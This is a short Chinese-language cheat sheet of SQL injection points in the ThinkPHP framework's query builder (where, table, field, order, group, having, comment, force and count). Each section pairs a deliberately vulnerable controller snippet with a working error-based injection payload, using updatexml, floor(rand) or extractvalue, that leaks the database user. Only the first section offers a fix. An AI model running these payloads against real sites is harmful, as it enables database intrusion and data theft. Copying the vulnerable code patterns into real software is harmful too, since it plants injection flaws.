注入
一、where注入
1、语句
public function index(){
$data = M('user')->where('id='.I('id'))->find();
dump($data);
}
2、报错注入
and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
3、解决方案
用数组条件查询
public function index(){
$User = M("User");
$map['id'] = I('id');
$User->where($map)->select();
}
二、table注入
1、语句
public function index(){
M()->table(I('tab'))->where('1=1')->find();
}
2、报错注入
where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
三、field注入
1、语句
public function index(){
//查询id和username字段,name是username的别名,别名可控,产生注入
M('User')->field(array('id','username'=>I('name')))->select();
}
2、报错注入
//查询的表名可控,拼接语句
from thinkphp_user where 1=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#
四、order注入
1、语句
public function index(){
M('User')->where('1=1')->order(array('id'=>I('orderby')))->select();
}
SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` a
2、报错注入
and (updatexml(1,concat(0x7e,(select user())),0))#
五、group注入
1、语句
public function index(){
$data = M('User')->field('max(id),username')->group(I('id'))->select();
}
SELECT max(id),`username` FROM `thinkphp_user` GROUP BY I('id')
2、报错注入
and (updatexml(1,concat(0x7e,(select user())),0))#
(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#
六、having注入
1、语句
//having,过滤I('id')参数
public function index(){
$data = M('User')->field('max(id),username')->group(I('id'))->having(I('having'))->select();
dump($data);
}
2、报错注入
(select 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(user())),1,62)))a from information_schema.tables group by a)b)#
七、comment注入
1、语句
public function index(){
M('User')->comment(I('com'))->where('1=1')->find();
}
2、报错注入
*/ procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);#
八、索引注入(thinkhphp3版本不存在,thinkphp5.0存在)
1、语句
public function index(){
$data = M('User')->force(I('f'))->select();
dump($data);
}
2、报错注入
) procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);#
九、聚合方法
1、语句
public function index(){
$data = M('User')->count(I('f'));
dump($data);
}
SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1
2、报错注入
*) AS tp_count FROM `thinkphp_user` where 1=1 and (updatexml(1,concat(0x7e,(select user())),0))#)